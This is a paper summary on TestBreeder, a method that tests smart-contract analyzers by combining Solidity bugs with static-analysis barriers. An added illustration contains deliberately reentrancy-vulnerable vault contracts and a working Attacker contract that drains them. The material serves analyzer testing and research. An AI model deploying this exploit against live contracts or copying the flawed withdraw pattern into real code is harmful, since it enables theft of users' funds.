Abstract

We address the absence of reliable tests for contract analyzers of smart contracts and present a systematic method to diversify test cases by combining smart-contract-specific bugs with static analysis barriers. Using contract analyzers is the most practical way to build a secure blockchain service, but the analyzers are relatively immature and lack stable performance metrics. Traditionally, performance reports compare static contract analyzers only on pre-defined test cases, such as the Juliet test suite. However, building such test suites is burdensome for smart contracts, which change frequently. In this paper, we propose an automated method to assess contract analyzers of smart contracts by diversifying test cases. In our experiments, the automatically generated test cases for five vulnerabilities exposed nine erroneous alarms in state-of-the-art contract analyzers.

Highlights

  • Smart contracts are at the core of blockchain services

  • We address the challenges that current contract analyzers face in dealing with the compound vulnerabilities of Solidity, which current trends in smart contracts make important to consider

  • In the evaluation, we explain how resilient the existing contract analyzers are against the test cases generated by TestBreeder


Summary

Introduction

Smart contracts are at the core of blockchain services. A smart contract is program code that runs on top of a blockchain. The execution model of smart contracts differs from that of general computing. A smart contract is deployed to a blockchain system in compiled bytecode form. Immutability makes securing smart contracts more challenging because there is no second chance to amend errors. This situation calls for proactive protection using systematized and automated processes, which resemble the design process for digital integrated circuits. Smart contracts update the shared state by executing the deployed code. Ethereum uses a virtual machine, called the "EVM," as the runtime environment for smart contracts. As with a general computer program, developers write smart contract code in a human-readable programming language (e.g., Solidity or Vyper) and compile it to EVM-executable bytecode. A transaction is a cryptographically signed message containing a destination address, the callvalue (the amount of digital asset transferred), the calldata (the general input data), execution fee (i.e., gas) related information, and so on.
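The method summarized in the abstract pairs a smart-contract-specific bug with a static analysis barrier to produce one test case. The Solidity below is an added illustration of what such a pair looks like; it is not code from the TestBreeder paper, and the page does not list the bug or barrier catalog the tool actually uses. The bug is a reentrancy (Ether sent before the caller's balance is zeroed). The barrier, routing the external call through a separate contract whose address is only known from storage at run time, is my own choice of a representative barrier. All contract and function names are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not code from the TestBreeder paper.
// Bug: reentrancy (external call before the balance is zeroed).
// Barrier (my assumption): the external call is made by a separate contract
// whose address is read from storage, so an analyzer that only inspects
// direct `.call` sites inside the vault may not see the re-entrant path.

interface IVault {
    function deposit() external payable;
    function withdraw() external;
}

// Variant 1: the bug with no barrier.
contract VaultDirect is IVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        // Interaction before effect: the recipient can re-enter withdraw().
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0;
    }
}

// Variant 2: the same bug behind the barrier.
interface IPayout {
    function pay(address payable to) external payable;
}

contract Payout is IPayout {
    function pay(address payable to) external payable {
        (bool ok, ) = to.call{value: msg.value}("");
        require(ok, "transfer failed");
    }
}

contract VaultIndirect is IVault {
    mapping(address => uint256) public balances;
    IPayout public payout; // set at deployment; unknown to a scan of this file alone

    constructor(IPayout _payout) {
        payout = _payout;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        // The Ether leaves through Payout.pay(); control still reaches
        // msg.sender before the balance is zeroed, so the bug is unchanged.
        payout.pay{value: amount}(payable(msg.sender));
        balances[msg.sender] = 0;
    }
}

// Oracle for a dynamic check: this attacker drains either vault if the bug is present.
contract Attacker {
    IVault public immutable target;

    constructor(IVault _target) {
        target = _target;
    }

    function attack() external payable {
        target.deposit{value: msg.value}();
        target.withdraw();
    }

    receive() external payable {
        // Re-enter while the vault can still pay out at least once more.
        if (address(target).balance >= msg.value) {
            target.withdraw();
        }
    }
}
```

Both vaults carry the same defect, so a sound analyzer should report reentrancy on both; a verdict that differs between VaultDirect and VaultIndirect is exactly the kind of erroneous result that diversified test cases are meant to surface, and deploying Attacker against each vault gives a ground-truth check that does not depend on any analyzer.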
